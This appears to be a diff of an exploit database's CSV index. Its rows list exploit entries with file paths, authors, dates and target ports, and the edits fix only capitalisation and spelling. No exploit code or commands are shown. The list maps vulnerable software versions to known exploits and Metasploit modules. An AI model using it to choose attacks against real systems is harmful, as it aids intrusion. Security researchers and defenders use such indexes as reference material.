9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC)",2009-10-15,Skylined,windows,remote,80 @@ -9281,18 +9282,18 @@ id,file,description,date,author,platform,type,port 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0 -9901,platforms/linux/dos/9901.txt,"nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80 +9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan, murderkey",windows,remote,80 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 -9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0 +9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0 9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0 9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0 -9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 +9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632 9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0 @@ -9302,25 +9303,25 @@ id,file,description,date,author,platform,type,port 9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 - LPD Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 -9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 -9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 +9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OS X) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 +9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OS X) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Remote File Upload / Execute",2009-07-22,spinbad,php,webapps,0 -9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 -9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 -9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 -9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 -9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 +9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OS X) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0 +9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OS X) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 +9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OS X) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 +9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 (OS X) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 +9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OS X) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0 -9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0 +9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0 9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit)",2004-10-21,patrick,multiple,remote,0 9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)",2001-02-28,"H D Moore",multiple,remote,5555 -9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",multiple,remote,0 +9943,platforms/multiple/remote/9943.rb,"Apple QuickTime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",multiple,remote,0 9944,platforms/multiple/remote/9944.rb,"Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit)",2008-10-23,egypt,multiple,remote,0 9945,platforms/multiple/remote/9945.rb,"Opera 9.10 - Configuration Overwrite (Metasploit)",2007-03-05,egypt,multiple,remote,0 9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)",2006-07-25,"H D Moore",multiple,remote,0 @@ -9331,19 +9332,19 @@ id,file,description,date,author,platform,type,port 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129 9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 -9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",hardware,dos,0 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,remote,0 -9958,platforms/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / information disclosure",2009-10-15,antisnatchor,jsp,webapps,0 -9961,platforms/php/webapps/9961.txt,"phpCMS 2008 - file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 -16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistant Cross-Site Scripting",2011-01-17,Penguin,php,webapps,0 +9958,platforms/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,jsp,webapps,0 +9961,platforms/php/webapps/9961.txt,"phpCMS 2008 - file Disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 +16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,php,webapps,0 9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - File Upload / Code Execution",2009-10-19,boecke,php,webapps,0 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - store() SQL Injection",2009-10-26,bookoo,php,webapps,0 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - post.php SQL Injection",2009-10-26,bookoo,php,webapps,0 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 -9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 +9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services source code Disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of Service",2009-10-23,"laurent gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 9971,platforms/windows/local/9971.php,"Spider Solitaire - (PoC)",2009-10-15,SirGod,windows,local,0 @@ -9353,30 +9354,30 @@ id,file,description,date,author,platform,type,port 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",hardware,webapps,80 9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server 4.4.17 / 5.0.65 - Cross-Site Scripting",2009-10-23,"Davide Canali",php,webapps,0 -9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 - file disclosure",2009-10-22,"Janek Vind",php,webapps,0 +9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 - file Disclosure",2009-10-22,"Janek Vind",php,webapps,0 9980,platforms/hardware/dos/9980.txt,"Websense Email Security - Denial of Service",2009-10-20,"Nikolas Sotiriu",hardware,dos,0 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security - Cross-Site Scripting",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 - '.m3u' Buffer Overflow (2)",2009-10-16,"Dragon Rider",windows,local,0 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 - '.xpas' file Buffer Overflow",2009-10-26,Dr_IDE,windows,local,0 -9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 - heap Overflow / null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 +9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 - heap Overflow / null pointer Dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,"bellick ",windows,local,0 -9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat - .U3D File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0 -9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 - SEH Overflow (PoC)",2009-10-05,"Rafael Sousa",windows,local,0 -9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code execution",2009-10-01,Trotzkista,windows,remote,0 +9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat - '.U3D' File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0 +9991,platforms/windows/local/9991.txt,"Alleycode 2.21 - SEH Overflow (PoC)",2009-10-05,"Rafael Sousa",windows,local,0 +9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication Username Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 -9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Authenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 -10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP disclosure",2009-09-25,nitr0us,hardware,remote,0 +9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 +10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP Disclosure",2009-09-25,nitr0us,hardware,remote,0 10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Security Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 10003,platforms/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL Injections",2009-10-09,"Andrea Fabrizi",php,webapps,0 10004,platforms/multiple/dos/10004.txt,"Dopewars 1.5.12 Server - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 -10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 +10005,platforms/windows/dos/10005.py,"Microsoft Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 - Exploit",2009-10-08,"Mark from infosecstuff",php,webapps,0 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 @@ -9384,11 +9385,11 @@ id,file,description,date,author,platform,type,port 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting",2009-10-02,CoreLabs,jsp,webapps,0 -10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 +10016,platforms/php/webapps/10016.pl,"JForJoomla Jreservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0 10018,platforms/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0 10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0 10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,linux,remote,2525 @@ -9406,7 +9407,7 @@ id,file,description,date,author,platform,type,port 10035,platforms/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - report Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,solaris,remote,0 10037,platforms/cgi/remote/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,cgi,remote,0 -10038,platforms/linux/local/10038.txt,"proc File - Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0 +10038,platforms/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",linux,local,0 10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant (PoC)",2009-10-23,Dr_IDE,windows,local,0 10042,platforms/php/webapps/10042.txt,"Achievo 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 10043,platforms/php/webapps/10043.txt,"redcat media - SQL Injection",2009-10-02,s4va,php,webapps,0 @@ -9423,7 +9424,7 @@ id,file,description,date,author,platform,type,port 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80 10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 10057,platforms/php/webapps/10057.txt,"AIOCP 1.4.001 - File Inclusion",2009-10-07,"Hadi Kiamarsi",php,webapps,0 -10058,platforms/php/webapps/10058.pl,"Joomla Recerca component - SQL Injection",2009-10-07,"Don Tukulesto",php,webapps,0 +10058,platforms/php/webapps/10058.pl,"Joomla Recerca Component - SQL Injection",2009-10-07,"Don Tukulesto",php,webapps,0 10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure",2009-11-12,"Daniel King",jsp,webapps,0 10060,platforms/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0 10061,platforms/jsp/webapps/10061.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-12,"Daniel King",jsp,webapps,0 @@ -9440,8 +9441,8 @@ id,file,description,date,author,platform,type,port 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - Cross-Site Scripting",2009-09-23,"Francis Provencher",novell,webapps,8030 10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389 -10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Exploi t(PoC)",2009-10-02,mu-b,osx,local,0 -10079,platforms/windows/remote/10079.txt,"Google Apps - mailto URI handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 +10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Exploit (PoC)",2009-10-02,mu-b,osx,local,0 +10079,platforms/windows/remote/10079.txt,"Google Apps - mailto URI handler cross-browser Remote command Execution",2009-10-01,pyrokinesis,windows,remote,0 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Parameter Remote File Inclusion",2010-01-07,Saywhat,php,webapps,0 @@ -9454,33 +9455,33 @@ id,file,description,date,author,platform,type,port 10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local,0 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 10086,platforms/multiple/remote/10086.txt,"WebKit - 'Document()' Function Remote Information Disclosure",2009-11-12,"Chris Evans",multiple,remote,0 -10088,platforms/php/webapps/10088.txt,"Wordpress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0 -10089,platforms/php/webapps/10089.txt,"Wordpress 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 -10090,platforms/php/webapps/10090.txt,"Wordpress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 +10088,platforms/php/webapps/10088.txt,"WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0 +10089,platforms/php/webapps/10089.txt,"WordPress 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 +10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution",2009-11-04,"Francis Provencher",multiple,remote,0 10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 < 3.3.5 - Format String / Security Bypass",2009-11-13,"Jeremy Allison",multiple,remote,0 -10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0 +10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - Authentication Bypass",2009-11-13,"Stuart Udall",php,webapps,0 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0 10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow",2009-11-16,ryujin,windows,remote,80 -10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - (LIST) Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 +10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Windows/x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80 -10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla Seamonkey 2.0 - (jar50.dll) Null Pointer Derefernce",2009-11-16,"Marcin Ressel",windows,dos,0 +10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - (jar50.dll) Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 -10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 Antivirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 -40083,platforms/php/webapps/40083.txt,"Wordpress Activity Log Plugin 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 +10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 +40083,platforms/php/webapps/40083.txt,"WordPress Activity Log Plugin 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / File Upload",2009-11-17,blackenedsecurity,asp,webapps,0 10162,platforms/windows/remote/10162.py,"Home FTP Server - 'MKD' Command Directory Traversal",2009-11-17,zhangmc,windows,remote,21 10163,platforms/windows/dos/10163.pl,"Novell eDirectory - HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,windows,dos,80 10164,platforms/windows/dos/10164.c,"Kaspersky AV 2010 9.0.0.463 - Local Denial of Service",2009-09-29,Heurs,windows,dos,0 